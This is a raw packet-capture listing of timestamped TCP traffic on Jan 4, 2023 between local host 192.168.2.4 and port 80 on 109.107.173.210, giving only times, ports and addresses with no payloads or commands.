Jan 4, 2023 16:47:24.181761980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181787968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181797028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181837082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181838036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181888103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181891918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181938887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181938887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181989908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181989908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182041883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182043076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182090044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182094097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182146072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182148933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182184935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182198048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182220936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182233095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182255030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182265997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182291031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182300091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182326078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182337046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182362080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182370901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182396889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182406902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182446003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182446957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182488918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182497978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182531118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182535887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182576895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182579994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182626963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182627916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182674885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182676077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182734966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182758093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182806015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182825089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182848930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182854891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182884932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182894945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182918072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182945967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182955027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.182960033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.182988882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183000088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183023930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183033943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183058977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183072090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183094978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183101892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183130026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183142900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183167934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183176994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183202982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183211088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183238029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183248043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183273077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183280945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183312893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183315992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183357000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183362007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183407068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183410883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183463097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183463097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183509111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183515072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183559895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183562040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183598995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183607101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183631897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183641911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183666945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183675051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183702946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183727980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183744907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183748007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183790922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183790922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183834076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183836937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183876991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183880091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183924913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183926105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.183970928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.183980942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.184017897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.184051991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.184089899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.184089899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.187057972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.477709055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.503721952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.512911081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.512979031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.512995958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513029099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513037920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513071060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513118029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513149023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513149023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513164043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513211012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513222933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513222933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513258934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513303995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513319969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513319969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513351917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.513416052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.513416052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515319109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515392065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515465975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515465975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515471935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515510082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515578032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515619040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515619040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515625954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515701056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515701056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515713930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515760899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515806913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515809059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515809059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515855074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515899897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515908957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515908957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515947104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515993118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.515995979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.515995979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516041994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516089916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516094923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516094923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516135931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516181946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516185045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516185045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516230106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516275883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516279936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516279936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516324043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516370058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516371965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516371965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516418934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.516469955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.516469955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517210007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517258883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517307997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517319918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517319918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517358065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517405987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517410994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517410994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517455101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517503023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517505884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517505884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517550945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517597914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517611980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517611980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517644882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517693043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517695904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517695904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517740965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517786980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517791986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517791986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517833948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517880917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517885923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517885923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517926931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517976046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.517977953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.517977953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518023014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518070936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518076897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518076897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518120050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518167973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518172979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518172979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518214941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518263102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.518265963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518265963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.518719912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539477110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539547920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539593935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539616108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539616108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539644003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539690971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539710045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539710045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539737940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539786100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539796114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539797068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539833069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539840937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539880991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539928913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.539936066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539936066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.539980888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540026903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540035963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540035963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540074110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540122032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540127039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540127039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540169001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540215015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540229082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540229082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540261984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540307999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540318966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540318966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540354967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540401936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.540411949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540411949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.540482044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542327881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542381048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542428970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542471886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542474985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542471886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542522907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542525053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542525053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542571068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542618990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542618990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542620897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542668104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542721987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542721987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542747021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542794943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542828083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542845011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542891979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542897940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542897940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542939901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.542959929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.542989016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543035030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543040991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543040991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543081999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543127060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543127060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543127060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543175936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543221951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543227911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543227911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543267965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543313026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543318033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543318033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543359041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543405056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543411970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543411970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543451071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543495893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543504000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543504000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543543100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543589115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543595076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543595076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543636084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543680906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543693066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543693066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543728113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543773890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543781042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543781042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543821096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543867111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543873072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543873072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543914080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.543953896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.543961048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.544011116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.544011116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.544011116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.544059038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.544075966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.544106960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.544140100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.544153929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.544174910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.544200897 CET	80	49695	109.107.173.210	192.168.2.4
